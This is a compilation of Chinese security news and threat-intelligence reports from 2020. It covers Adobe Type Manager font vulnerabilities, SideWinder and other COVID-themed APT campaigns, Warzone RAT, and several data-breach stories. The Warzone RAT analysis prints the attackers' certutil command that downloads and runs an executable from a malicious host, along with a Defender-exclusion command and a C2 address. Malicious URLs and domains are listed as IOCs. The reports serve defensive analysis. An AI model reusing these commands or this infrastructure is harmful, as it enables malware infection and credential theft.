感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/RvTZWvcXiXsI7xB6L9RWIg 漏洞背景 3月23日，微软发布公告ADV200006称Adobe Type Manager Library中存在2个未修补的漏洞，当Windows Adobe Type Manager Library处理Adobe Type 1 PostScript 格式字体时存在两个远程执行代码漏洞。 4月15日，谷歌安全团队称已发现该漏洞的野外利用，微软在4月例行安全更新中，已修补CVE-2020-1020/CVE-2020-0938漏洞。 腾讯安全团队已对漏洞进行分析，该漏洞可稳定利用: 视频详见：https://mp.weixin.qq.com/s/RvTZWvcXiXsI7xB6L9RWIg 漏洞版本 Windows 10 for 32-bit Systems Windows 10 for x64-based Systems Windows 10 Version 1607 for 32-bit Systems Windows 10 Version 1607 for x64-based Systems Windows 10 Version 1709 for 32-bit Systems Windows 10 Version 1709 for ARM64-based Systems Windows 10 Version 1709 for x64-based Systems Windows 10 Version 1803 for 32-bit Systems Windows 10 Version 1803 for ARM64-based Systems Windows 10 Version 1803 for x64-based Systems Windows 10 Version 1809 for 32-bit Systems Windows 10 Version 1809 for ARM64-based Systems Windows 10 Version 1809 for x64-based Systems Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for ARM64-based Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1909 for 32-bit Systems Windows 10 Version 1909 for ARM64-based Systems Windows 10 Version 1909 for x64-based Systems Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows 8.1 for 32-bit systems Windows 8.1 for x64-based systems Windows RT 8.1 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) Windows Server 2008 for Itanium-Based Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Server 2012 Windows Server 2012 (Server Core installation) Windows Server 2012 R2 Windows Server 2012 R2 (Server Core installation) Windows Server 2016 Windows Server 2016 (Server Core installation) Windows Server 2019 Windows Server 2019 (Server Core installation) Windows Server, version 1803 (Server Core Installation) Windows Server, version 1903 (Server Core installation) Windows Server, version 1909 (Server Core installation) 漏洞分析 漏洞模块为atmfd.sys(Windows 10 1703后是fontdrvhost.exe)，成因在于Windows解析PostScript字体中的BlendDesignPositions或BlendVToHOrigin时，没有经过安全检查，导致处理模块可能引发越界写，栈溢出的问题。 SetBlendDesignPositions BlendDesignPositions格式如下： Win7 x86环境下，atmfd!SetBlendDesignPositions在解析BlendDesignPositions array时，会将内容全部保存到栈上，缓冲区的大小是960(0x3C0)，因此最多存放16个sub-array,当sub-array数量大于16时，会引发溢出: ParseBlendVToHOrigin atmfd!ParseBlendVToHOrigin在处理数组BlendVToHOrigin时存在两处溢出。 Win7x86下由于定义的int v12[2]仅有8个字节，当NumMasters大于2时，引发缓冲区溢出: NumMasters大小可以在字体文件中通过构造特殊的BlendDesignPositions或WeightVector控制: 第二处溢出发生在atmfd.sys读取BlendVToHOrigin时，首先获取当前NumMasters并根据其大小将BlendVToHOrigin的数据复制到栈中的V11，由于NumMasters可控，当NumMasters过大时会对栈中的v11造成溢出，V11同样也是8字节: 第二次溢出时，由于V12在V11的高地址方向，所以当V11溢出时会覆写V12中保存的指针。 补丁分析 由于win7已停止更新，win10 1703后微软把atmfd.sys模块的功能移植到fontdrvhost.exe中，补丁前后漏洞模块共做了2处修改，2个函数均存在栈溢出漏洞: 补丁后SetBlendDesignPositions中增加了条件判断，sub-array数量超过16时返回错误，避免溢出： 补丁后ParseBlendVToHOrigin中启用了GS保护栈的完整性，并在读取BlendVToHOrigin数组前，限制了NumMasters大小； 解决方案 1. 推荐企业用户部署腾讯T-Sec高级威胁检测系统（腾讯御界）对黑客利用漏洞的攻击行为进行检测。腾讯T-Sec高级威胁检测系统，是基于腾讯安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统，该系统可及时有效检测黑客对企业网络的各种入侵渗透攻击风险。参考链接：https://cloud.tencent.com/product/nta 腾讯T-Sec高级威胁检测系统可检测利用Type 1字体漏洞的攻击行为 2.推荐企业用户使用腾讯T-Sec终端安全管理系统（御点）修补各终端系统的安全漏洞，个人用户可使用腾讯电脑管家的漏洞修补功能安装补丁，也可使用Windows Update。 时间线 3月23日，微软发布通告ADV200006称Adobe Type Manager Library中存在2个未修补的漏洞； 3月24日，腾讯安全发布漏洞通告； 4月15日，微软官方发布CVE-2020-1020/CVE-2020-0938漏洞通告及补丁。 参考链接： https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1020 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0938

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/yxUTG3Qva169-XiYV0pAyQ   一、背景介绍 伴随新冠疫情在全球范围的爆发，疫情的动态资讯成为我们每天必会定接触到的外界信息，在这种大环境下，我们对疫情主题相关的推送信息警惕性会相对变低。而善于浑水摸鱼，披狼皮装羊的APT组织自然不会放过这种增热点的机会，以“新冠疫情”为主题的APT攻击活动从2月份起就持续不断。 最近，腾讯安全威胁情报中心就捕获到了一起响尾蛇（SideWinder）APT组织以新冠疫情为主题针对巴基斯坦军方的攻击活动。 响尾蛇（SideWinder）是腾讯安全威胁情报中心最早在2018年披露的APT攻击组织，该组织最早的攻击活动可以追溯到 2012 年。该组织主要针对巴基斯坦、中国大陆的政府、军工、军事目标等进行攻击活动。攻击武器库包括PC端、移动端等。 二、技术分析 本次攻击的诱饵为一个名为Pak_Army_Deployed_in_Country_in_Fight_Against_Coronavirus.pdf.lnk的快捷方式文件： 该lnk文件的基本属性 诱饵的生成时间和其他属性 可以看到攻击者的诱饵生成时间为2019年的6月19日，在vmware虚拟机生成。 执行快捷方式后，会从http://www.d01fa.net/images/D817583E/16364/11542/f2976745/966029e下载hta文件并且执行。 下载回来的hta会对受害设备上的.NET进行版本检测，删除除了V2和V4以外的版本，还通过shell指令指定执行的版本，此外，样本之后释放的的rekeywiz.exe.config配置文件目的与之相同，均为防止不同.NET版本之前出现兼容性问题。 除了对受害设备.NET版本进行版本选择之外，HTA文件还会对设备上的杀软进行检测： 之后，会创建一个HTA实例，通过url下载第二个HTA文件并将之执行，同时释放命名为“Pak_Army_Deployed_in_Country_in_Fight_Against_Coronavirus.pdf”的PDF诱饵文档： 释放的诱饵文档为： 可以看到，诱饵内容跟新冠疫情、巴基斯坦军方相关。 第二个HTA文件其数据解密方式，以及总体框架与第一个HTA文件相同，主要功能是在C:\ProgramData\创建了一个fontFiles文件夹（包含释放的四个文件：Duser.dll、rekeywiz.exe、rekeywiz.exe.config、SOHYXY.tmp），利用rekeywiz.exe白文件加载Duser.dll黑文件。该白加黑的手法也是SideWinder惯用伎俩。其中TMP文件的文件名为随机字符： Duser.dll为一个加载器，主要目的是对之前释放的SOHYXY.tmp文件进行简单的异或解密，然后进行加载： 解密后的SystemApp.dll文件，是为最终释放的RAT。 该RAT的功能跟之前的类似，包括信息收集、文件上传等。 如对用户信息、设备信息、网卡信息、已安装杀软的信息、磁盘驱动设备信息、设备已安装进程信息等进行窃取、收集： 文件上传途径有两种，对应RAT在配置模块中的两个等待上传的文件列表，C2通过下发指令修改配置模块，实现对所有文件或指定文件的上传。文件上传： 对C2的下发指令进行分析，可得出以下指令集： RAT会在fontFiles文件夹中新建名为“font”的文件，用于保存C2下发的指令，但指令是经过加密的，经过解密之后，可查看指令明文，而每一次指令下发，原指令数据都会被覆盖，生成新的font文件。 三、关联分析 除了发现的以“新冠疫情”为主题的样本以外，我们还发现了SideWinder（响尾蛇）的多个其他攻击活动。 如Additional_CSD_Rebate.pdf.lnk，以向退役军人发放csd回扣卡为主题的进行钓鱼活动： 诱饵文件除了lnk之外，还有使用office漏洞的攻击，如 但是最终执行的payload都大同小异，就不再赘述。 四、安全建议 1、建议重要机构网管培训工作人员不要随意打开不明来源的邮件附件，在邮件目的及发件人均未知的情况下，建议不要访问附件。 2、建议企业用户使用腾讯T-Sec终端安全管理系统（御点）修补漏洞，及时安装系统补丁，可减少被漏洞攻击的风险，同时注意打开Office文档时，避免启用宏代码。 3、推荐企业用户部署腾讯T-Sec高级威胁检测系统（御界）对黑客攻击行为进行检测。 腾讯T-Sec高级威胁检测系统，是基于腾讯安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统，该系统可及时有效检测黑客对企业网络的各种入侵渗透攻击风险。参考链接：https://cloud.tencent.com/product/nta 五、附录 1、IOCs 3c9f64763a24278a6f941e8807725369 40fd59323c3883717faca9424b29b9aa 3e0c08851aafbca17dda7ce54ba52cb9 1aa880affbd363401e1a25c07ad1ef1e 95413052d03971654687d8508a6a32e9 7a4f9c2e5a60ec498c66d85d2df351e8 120e3733e167fcabdfd8194b3c49560b 7442b3efecb909cfff4aea4ecaae98d8 bfad291d000b56ddd8a331d7283685b2 fef12d62a3b2fbf1d3be1f0c71ae393e 58363311f04f03c6e9ccd17b780d03b2 9b1d0537d0734f1ddb53c5567f5d7ab5 URL https://cloud-apt.net/202/AEETLbHd0DGh9r86lU6CFOCttbakx5vMmEGfKLTP/16364/11542/9c8ea254 https://www.d01fa.net /202/AEETLbHd0DGh9r86lU6CFOCttbakx5vMmEGfKLTP/16364/11542/9c8ea254 http://www.d01fa.net/plugins/16364/11542/true/true/ http://cloud-apt.net /plugins/16364/11542/true/true/ http://www.d01fa.net/cgi/8ee4d36866/16364/11542/58a3a04b/file.hta http://cloud-apt.net /cgi/8ee4d36866/16364/11542/58a3a04b/file.hta http://www.d01fa.net/images/D817583E/16364/11542/f2976745/966029e http://www.fdn-en.net/images/0B0D90AD/-1/2418/9ccd0068/9d68236 http://www.nrots.net/images/5328C28B/15936/11348/7c8d64e9/e17e25e http://ap-ms.net/202/M2qIMRE6Wu5W0pgsgYpzoKzlzclgtHbcLzhudKaF/-1/12571/d2d06434 https://www.sd1-bin.net/images/2B717E98/-1/12571/4C7947EC/main.file.rtf https://reawk.net/202/jQcPZ3kx6hGod25WMnTocKStUToZEPRy6WfWkEX3/-1/12571/87854fea 2、参考链接 https://s.tencent.com/research/report/799.html https://s.tencent.com/research/report/659.html https://mp.weixin.qq.com/s/CZrdslzEs4iwlaTzJH7Ubg  

ZDNet从一位读者提供的消息当中得知，目前有超过60万Email.it用户的数据正在暗网上被出售。这家意大利的电子邮件服务提供商周一向ZDNet表示：“不幸的是，我们必须确认，我们遭遇了黑客的攻击。” Email.it黑客攻击在周日曝光，当时黑客们在Twitter上宣传了一个暗网网站，在该网站上出售公司的数据。黑客声称实际入侵发生在两年多前，即2018年1月，黑客入侵了Email.it数据中心，从服务器上拿走了任何可能的敏感数据，并选择给这家意大利的电子邮件服务提供商一个机会修补漏洞，同时要求们给黑客一点赏金，但是这家意大利的电子邮件服务提供商拒绝与黑客谈判，并继续欺骗它的用户。 另外，黑客们在2月1日试图勒索Email.it，当时他们要求对方支付赏金。Email.it的一位发言人周一告诉ZDNet，该公司拒绝支付，转而通知了意大利邮政警察局（CNAIPIC）。在勒索失败后，黑客们现在正在以0.5到3个比特币(3500到22000美元)不等的要价出售该公司的数据。这些数据库包含了注册了免费Email.it电子邮件账户的用户信息。 黑客声称，这些数据库包含了2007年至2020年期间注册并使用该服务60多万用户的明文密码、安全问题、电子邮件内容和电子邮件附件。   (稿源：cnBeta，封面源自网络。）

感谢腾讯御见威胁情报中心来稿！ 原文：https://mp.weixin.qq.com/s/UXbsJsCbz6FsQ-ztbk6CaQ   一、概述 目前，由新型冠状病毒引起的肺炎疫情（COVID-19）在全球蔓延，已有190个国家存在确诊病例，全球确诊人数已经超过43万人，死亡病例超过1.9万。中国大陆已基本控制住疫情，但在意大利、西班牙、美国等发达国家疫情仍处于爆发期，世界卫生组织已将疫情的全球风险级别确定为“非常高”。 而随着新冠病毒疫情（COVID-19）在全球蔓延，以此为主题的网络攻击事件骤然增长。其中中国大陆、意大利、韩国等国家成为黑客网络攻击的高风险地区。腾讯安全威胁情报中心自疫情爆发后，已检测到多起以新冠病毒疫情为主题的攻击活动。 攻击者大多以投递邮件的方式，构造诱饵文件欺骗用户点击，恶意文件类型多种多样，覆盖EXE、MS Office宏文档、漏洞文档、lnk文件、VBS脚本等。而攻击的背景也包括具有国家背景的专业APT组织和普通黑产组织。 本文对近期发现的以新冠病毒疫情为诱饵的攻击活动加以汇总，供大家参考。在此提醒广大政企单位和个人用户，在做好疫情防控的同时，也要做好网络安全的防护工作。 二、近期活跃的APT攻击及黑产 01 具有国家背景的APT攻击活动 1)海莲花（APT32）组织 海莲花，又称APT32、OceanLotus，被认为是具有越南国家背景的攻击组织。该组织自发现以来，一直针对中国的政府部门、国企等目标进行攻击活动，为近年来对中国大陆进行网络攻击活动最频繁的APT组织。腾讯安全威胁情报中心在2019年也多次曝光了该组织的攻击活动。 自新冠疫情爆发以来，该组织正变本加厉对中国大陆相关目标进行网络攻击活动。攻击方式依然采用鱼叉邮件攻击，钓鱼邮件同样使用跟新冠病毒疫情相关的诱饵文档。如： 攻击诱饵包括lnk文件、白加黑攻击方式等： 技术细节跟之前曝光的变化不大，本文不再过多描述。 除了投递恶意木马外，海莲花还是用无附件攻击，用来探查用户的一些信息： 也有附件和探针一起的： 2)蔓灵花（BITTER）组织 蔓灵花也是对中国大陆进行攻击的比较频繁的一个攻击组织，其目标包括外交部门，军工、核能等重点企业。 在疫情爆发后，该组织同样采用了跟疫情相关的诱饵来对一些目标进行攻击： 最终释放的特种木马为2019年才开始采用的C#木马： 3)Kimsuky组织 Kimsuky组织被认为是来自东亚某国的攻击组织，该组织一直针对韩国政府部门、大学教授等目标进行攻击活动。Kimsuky组织为韩国安全厂商命名，腾讯安全威胁情报中心在2018、2019均披露过的Hermit（隐士）同属该攻击组织。 在2020年2月底到3月初期，韩国是除中国大陆外受疫情影响最严重的国家。于是Kimsuky十分活跃，开始利用疫情相关的诱饵，对韩国目标进行攻击活动。同时我们发现，该组织还同时具备多平台的攻击能力。 此外，该组织还针对MacOS进行攻击： 最终的恶意文件使用python编写，用来收集用户信息，和C&C进行通信来获取命令等： 4)TransprentTribe组织 TransparentTribe APT组织，又称ProjectM、C-Major，是一个来自巴基斯坦的APT攻击组织，主要目标是针对印度政府、军事目标等。腾讯安全威胁情报在2019年也多次曝光该组织的一些攻击活动。 虽然新冠病毒疫情暂时还未在印度爆发，但是印度也已经在进行一些疫情相关的防控举措，包括关闭国门，加强检疫等等。但是网络攻击不会因此而停止，攻击者同样借助疫情相关资讯进行攻击活动。如： 执行后的宏代码为： 执行后的宏代码为： 02 其他网络黑产活动 包括白象、毒云藤、gamaredon等攻击组织均使用新冠疫情相关诱饵对特定目标进行攻击。由于已经有大量报告针对该些活动的分析，本文就不再罗列。 1)网络诈骗 网络诈骗也是网络攻击活动中的一种，在疫情爆发之后，腾讯安全威胁情报中心检测到多次使用疫情有关的内容进行恶意诈骗的案例。如： 在该案例中，借口让人捐款来研发疫苗，诱使收件人进行比特币转账。所幸，该诈骗活动并未有人上当： 2)投递窃密木马 群发垃圾邮件投递窃密木马也是近期黑产惯用的一些手法，如下： Hancitor木马 假冒保险发票信息 TA505 假冒COVID-19 FAQ的诱饵文档，欺骗目标用户启用宏代码。 商贸信 假冒世卫组织发送诈骗邮件投递商业木马。 商贸信 假冒世卫组织发送诈骗邮件投递商业木马。 最终释放的窃密木马功能包括cookie窃取、键盘记录、上传下载文件等。 4)勒索病毒 近期检测到勒索病毒主要为两种： 一种为使用新冠疫情为诱饵传播勒索病毒，如CORONAVIRUS_COVID-19.vbs ，最终释放Netwalker勒索病毒 另外一种勒索病毒直接将自己命名为新冠病毒： 三、总结和建议 从本文罗列的以新冠疫情（COVID-19）有关的攻击活动可以看到，网络攻击会紧跟社会热点，精心构造跟时事、热点有关的资讯作攻击诱饵，诱使目标用户点击再植入恶意文件或者进行网络诈骗活动。 在全球新冠疫情全球大爆发的时候，利用新冠疫情相关诱饵进行的网络攻击，其中有些攻击对象还包括医疗机构，手段可谓卑劣至极！因此我们提醒政企机关单位和个人，务必提高警惕，勿轻易信任何与疫情有关的资讯邮件，勿轻易启用Office的宏代码查看文档。 我们建议政企机构使用腾讯安全推荐的方案进行防御，个人用户推荐使用腾讯电脑管家，保持实时防护功能为开启状态。 腾讯安全解决方案部署示意图 IOCs MD5 f6fe2b2ce809c317c6b01dfbde4a16c7 0e5f284a3cad8da4e4a0c3ae8c9faa9d aa5c9ab5a35ec7337cab41b202267ab5 d739f10933c11bd6bd9677f91893986c d9ce6de8b282b105145a13fbcea24d87 a9dac36efd7c99dc5ef8e1bf24c2d747 a4388c4d0588cd3d8a607594347663e0 1b6d8837c21093e4b1c92d5d98a40ed4 31f654dfaa11732a10e774085466c2f6 0573214d694922449342c48810dabb5a 501b86caaa8399d508a30cdb07c78453 e96d9367ea326fdf6e6e65a5256e3e54 da44fd9c13eb1e856b54e0c4fdb44cc7 e074c234858d890502c7bb6905f0716e e262407a5502fa5607ad3b709a73a2e0 ce15cae61c8da275dba979e407802dad b7790bf4bcb84ddb08515f3a78136c84 379f25610116f44c8baa7cb9491a510d 7a1288c7be386c99fad964dbd068964f 258ed03a6e4d9012f8102c635a5e3dcd f272b1b21a74f74d5455dd792baa87e1 域名 m.topiccore.com libjs.inquirerjs.com vitlescaux.com vnext.mireene.com crphone.mireene.com new.915yzt.cn primecaviar.com bralibuda.com dysoool.com m0bile.net fuly-lucky.com IP 63.250.38.240 107.175.64.209  

感谢腾讯御见威胁情报中心来稿！ 原文：https://mp.weixin.qq.com/s/TRY4-1aUf5gTLHOWQ7PWuQ   一、背景 腾讯安全威胁情报中心检测到有黑客利用新冠肺炎(Covid-19)疫情相关的诱饵文档攻击外贸行业。黑客伪造美国疾病控制和预防中心（CDC）作为发件人，投递附带Office公式编辑器漏洞的文档至目标邮箱，收件人在存在Office公式编辑器漏洞（CVE-2017-11882）的电脑上打开文档，就可能触发漏洞下载商业远控木马Warzone RAT。 Warzone RAT是在网络上公开销售的商业木马软件，具有密码采集、远程执行任意程序、键盘记录、远程桌面控制、上传下载文件、远程打开摄像头等多种远程控制功能，并且还可以在包括Win10在内的Windows系统上进行特权提升。 根据腾讯安全威胁情报中心数据，该病毒从3月23日开始传播，目前已有广东、上海、湖北等地的外贸企业受到黑客钓鱼邮件的攻击。腾讯安全专家提醒企业用户小心处理不明邮件，建议网管使用腾讯T-Sec高级威胁检测系统检测黑客攻击，客户端可采用腾讯T-Sec终端安全管理系统或腾讯电脑管家拦截病毒。 二、样本分析 攻击邮件伪装成美国疾病控制和预防中心(cdc.gov)发送关于Covid-19的重要更新通知，将漏洞利用的DOC Word文件命名为COVID-19 – nCoV – Special Update.doc，引导收件人打开查看。 此时如果用户在没有安全防护软件，且使用没有修复CVE-2017-11882漏洞的Office打开此文档，就会触发漏洞中的恶意代码，然后恶意代码从C2服务器下载并运行木马病毒。文档下载木马的命令为： CmD /C cErTuTiL -uRlCAchE -sPlIT -f http[:]//getegroup.com/file.exe %TMP%\\1.exe&start %TMP%\\1.exe File.exe外壳程序采样C#编写，代码经过高度混淆，运行时经过两次解密在内存中Invoke执行最终的PE文件，该PE通过分析可确认为商业远控木马Warzone RAT。 Warzone RAT最早2018年在warzone[.]io上公开出现，目前在warzone[.]pw上提供销售。Warzone RAT商业木马软件具有以下功能： 可通过VNC进行远程桌面控制 可通过RDPWrap进行隐藏的远程桌面控制 特权升级（包括最新的Win10系统） 远程开启摄像头 盗取浏览器密码（Chrome，Firefox，IE，Edge，Outlook，Thunderbird，Foxmail） 下载、执行任意文件 离线键盘记录器或实时键盘记录器 远程shell 文件管理 进程管理 反向连接 三、窃密 Warzone RAT木马窃密功能包含窃取各类浏览器登陆使用的账号密码以及邮件客户端保存的账号信息。 获取保存在Chrome中的账号密码信息。 获取保存在IE浏览器中的账号密码信息。 获取OutLook邮箱中的账号密码信息。 获取Thunderbird邮箱中的账号密码信息。 获取Firefo浏览器中的账号密码信息。 四、特权提升 如果Warzone RAT以提升的特权运行，则会使用以下PowerShell命令将指定路径添加到Windows Defender的排除项中： powershell Add-MpPreference -ExclusionPath 对于Windows 10以下的版本，使用存储在其资源WM_DSP中的模块进行UAC绕过。 该模块代码最终使用pkgmgr.exe以更高的特权加载恶意程序。 对于Windows 10则利用sdclt.exe 的权限自动提升功能，该功能在Windows备份和还原机制的上下文中使用。 五、远程控制 解密出C2地址：phantom101.duckdns.org:5200，与该地址建立连接成为受控机，使电脑完全被黑客控制。 与服务器进行TCP通信，传输数据使用RC4加密算法加密，密钥为”warzone160”。 与控制端通信的部分协议命令和含义如下： C&C 操作 2 枚举进程信息 4 枚举磁盘信息 6 枚举文件 8 读取文件 10 删除文件 12 杀死进程 14 远程Shell 20 开启摄像头 26 卸载木马 28 上传文件 32 从浏览器获取密码 34 下载并执行程序 36 键盘记录(在线) 38 键盘记录(离线) 40 RDP 42 建立反向连接 44 反向连接断开 48 Socket设置 58 执行文件 60 读取日志 六、安全建议 1、建议不要打开不明来源的邮件附件，对于邮件附件中的文件要谨慎运行，如发现有脚本或其他可执行文件可先使用杀毒软件进行扫描； 2、安装CVE-2017-11882漏洞补丁：https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882 3、 禁用公式编辑器组件: a) 可以通过运行如下命令禁用Office编辑器： reg add"HKLMSOFTWAREMicrosoftOfficeCommonCOMCompatibility{0002CE02-0000-0000-C000-0000 b) 对于 x64 OS 中的32位Microsoft Office 软件包, 运行以下命令: reg add"HKLMSOFTWAREWow6432NodeMicrosoftOfficeCommonCOM Compatibility{0002CE02-0000-0000-C000-000000000046}"/v "Compatibility Flags" /t REG_DWORD /d 0x400 4、企业网管，可以设置拦截以下邮件发件人的邮件。 de.iana@aol.com shenzhen@faithfulinc.com 5、推荐企业用户部署腾讯T-Sec高级威胁检测系统（腾讯御界）对黑客攻击行为进行检测。 腾讯T-Sec高级威胁检测系统，是基于腾讯安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统，该系统可及时有效检测黑客对企业网络的各种入侵渗透攻击风险。参考链接：https://cloud.tencent.com/product/nta 6、企业终端系统保护 终端电脑可部署腾讯T-Sec终端安全管理系统（御点）拦截病毒木马攻击，更多信息参考链接：https://s.tencent.com/product/yd/index.html。 IOCs C&C phantom101.duckdns.org:5200 MD5 76387fb419cebcfb4b2b42e6dc544e8b 55b75cf1235c3345a62f79d8c824c571 030e95d974c5026499ca159055b2dfa6 URL http://getegroup.com/file.exe 参考链接 https://www.freebuf.com/column/156458.html https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/

路透社报道称，随着新冠病毒引发的 COVID-19 疾病的全球大流行，世界卫生组织也在本月遭受了多倍的网络攻击。WHO 首席信息安全官 Flavio Aggio 表示：“黑客的身份尚不清楚，但他们本次并未得逞”。即便如此，安全专家还是将源头指向了某个被称作 DarHotel 的高级网络间谍黑客。 Flavio 警告称：疫情爆发以来，冠状病毒已在全球范围内导致了 1.5 万多人的死亡，同时针对抗击疫情的世界卫生组织及其合作机构的攻击企图也出现了激增。 网络安全专家兼纽约黑石法律集团律师 Alexander Urbelis 指出，其在 3 月 13 日前后监测到了针对 WHO 的恶意活动。 当时他正在对一群黑客保持持续的关注，结果发现他们激活了一个山寨 WHO 内部电子邮件系统的恶意网站，于是很快意识到了黑客组织的攻击企图。 尽管 Urbelis 表示自己不清楚谁该为此事负责，但据另外两位消息人士透露，其怀疑幕后是一个名叫 DarkHotel 的高级黑客。自 2007 年以来，他就一直在从事网络间谍活动。   （稿源：cnBeta，封面源自网络。）

近日的反病毒软件测试结果表明，Windows 10 操作系统预装的 Windows Defender，已能够与业内领先的第三方安全供应商相当。尴尬的是，如果你的系统已经打上了三月的补丁，那它很可能漏过对某些文件的扫描。外媒 BornCity 报道称，微软在 3 月的“补丁星期二”那天发布了面向 Windows 和其它产品的安全更新。   用户汇报称，无论是选择快速或完整扫描，Windows Defender 都有可能在期间跳过对某些文件的检查，就像是在配置文件中已经将之列入了排除项一样。 与此同时，行动中心也会在遇到该问题时，向用户推送一条错误消息。其写道：“由于排除或网络扫描设置的原因，扫描期间跳过了某个项目”。 有些人可能觉得这与 Windows Defender 的特定版本有关，且能够通过与 Windows 10 系统拆分的升级措施来避免。 然而现在的情况是，无论你用的是哪个版本的 Windows Defender 反病毒软件客户端，它都会在打上三月补丁后遇到这个问题。 外媒 Softpedia 在运行 Windows 10 1909 的设备上尝试了最新的客户端和病毒定义，结果也在执行快速或完整扫描时重现了这个故障。 尽管没有设置任何排除项，但扫描结束后，还是在 Windows 10 的行动中心里看到了跳过某些文件扫描的错误通知。 截止发稿时，微软似乎尚未意识到这个问题。目前暂不清楚这是个例还是普遍现象，以及到底有多少设备受到了影响。 对于用户来说，或许可以尝试其它方法来确保安全，或等到微软在 4 月 14 日发布下一批安全更新时再修复。   （稿源：cnBeta，封面源自网络。）

随着新冠病毒引发的 COVID-19 疫情在全球的爆发，各种鱼龙混杂的“疫情追踪器”也开始盯上粗心的移动设备用户。一旦被名为 CovidLock 的勒索软件给劫持，用户将不得不支付 100 美元的赎金，以解锁他们的 Android 智能机。 据悉，这款勒索软件会锁定受害者的手机屏幕并更改设备密码。如果此前未设定密码，CovidLock 还会自动设置一个密码，以迫使用户就范。 DomainTools 分析称，受害者必须支付相当于 100 美元的 BTC 赎金才能解锁他们的智能手机，否则将窃取照片、联系人之类的敏感信息，甚至在网络上泄露一部分细节。 截图文字显示 —— 你的手机已被加密，请在 48 小时内支付 100 美元的 BTC，否则包括联系人、照片、视频等在内的所有内容将被删除，所有社交媒体账户会被公开、且本机存储将被完全抹除。 此外攻击者警告称 —— 你的 GPS 已被监视，我们已知晓你的位置。如尝试进行任何愚蠢的操作，手机将触发自毁。 好消息是，通过逆向工程，DomainTools 已经搞定了这款勒索软件的解锁密钥，此外研究团队正密切关注攻击者的 BTC 钱包，更多细节将很快公布。 对于普通用户来说，谨记远离任何不信任的应用来源，并仔细检查手机已安装的每款 App 的权限设置。   （稿源：cnBeta，封面源自网络。）

据外媒报道，在两艘邮轮爆发了新冠病毒后被迫在全球范围内停止运营的Princess Cruises（公主邮轮）目前已证实存在数据泄露问题。据信，这份发布在其网站上的通知实际上是在3月初发布的。该份通知称，公司在2019年4月至7月的4个月时间内发现了大量未经授权的电子邮件账号登入，其中一些包含了职工、邮轮工作人员和客人的个人信息。 Princess Cruises指出，姓名、地址、社会安全号码和政府证件如护照号码和驾驶执照号码以及财务和健康信息都可能被窃取。但这家公司表示，潜在的影响数据并不是针对每位客人。 另外这家公司表示，他们是在2019年5月发现了这一网络可疑活动。目前并不清楚为何该它花费了近一年时间才披露这一漏洞。对此，该公司发言人没有立即回应置评请求。 拥有Princess品牌的嘉年华邮轮公司(Carnival)本周股价下跌了逾30%，此前这家公司宣布将暂停旗下18艘邮轮的营运。该公司在日本和最近的美加州分别发生了两起涉及载有数十名新冠病毒感染者的事件。 此外，Princess Cruises也没有说明是在哪个司法管辖区报告了这一数据泄露事件。如果是在欧洲，则会因违反欧洲数据保护规定而会被处以高达其年营业额4%的罚款处罚。   （稿源：cnBeta，封面源自网络。）

开源组件已成为当今许多软件应用程序的基础组成部分，这也使得其在安全性方面受到越来越严格的审查。根据开源管理专家 WhiteSource 发布的一份新报告，可知 2019 年公开的开源软件漏洞数增加到了 6000 多个，增速接近 50% 。庆幸的是，有超过 85% 的开源漏洞已被披露，且提供了相应的修复程序。 遗憾的是，开源软件的漏洞信息并没有集中在一处发布，而是分散在数百种资源中。有时索引的编制并不正确，导致搜索特定数据成为了一项艰巨的挑战。 根据 WhiteSource 的数据库，在国家漏洞数据库（NVD）之外报告的所有开源漏洞中，只有 29％ 最终被登记在册。 此外研究人员比较了 2019 年漏洞排名前七的编程语言，然后将之与过去十年的数量进行了比较，结果发现历史基础最好的 C 语言占有最高的漏洞百分比。 PHP 的相对漏洞数量也大幅增加，但没有迹象表明其流行度有同样的提升。尽管 Python 在开源社区中的普及率持续上升，但其漏洞百分比仍相对较低。 报告还考虑了通用漏洞评分系统（CVSS）的数据，是否是衡量补漏优先级的最佳标准。 过去几年中，CVSS 已进行了多次更新，以期达成为可对所有组织和行业提供支持的客观可衡量标准。 然而在此过程中，CVSS 也改变了高严重性漏洞的定义。这意味着在 CVSS v2 标准下被定为 7.6 的漏洞，在 CVSS v3.0 标准下可能被评为 9.8 。 对于各个开源软件的开发团队来说，这意味着他们面临着更多的高严重性漏洞问题，导致现有超有 55% 的用户被高严重性或严重性问题所困扰。 报道作者总结道：列表中提及的开源项目漏洞，并不意味着其本质上是不安全的。作为用户，也应了解相关安全风险，并确保将开源依赖保持在最新状态。   （稿源：cnBeta，封面源自网络。）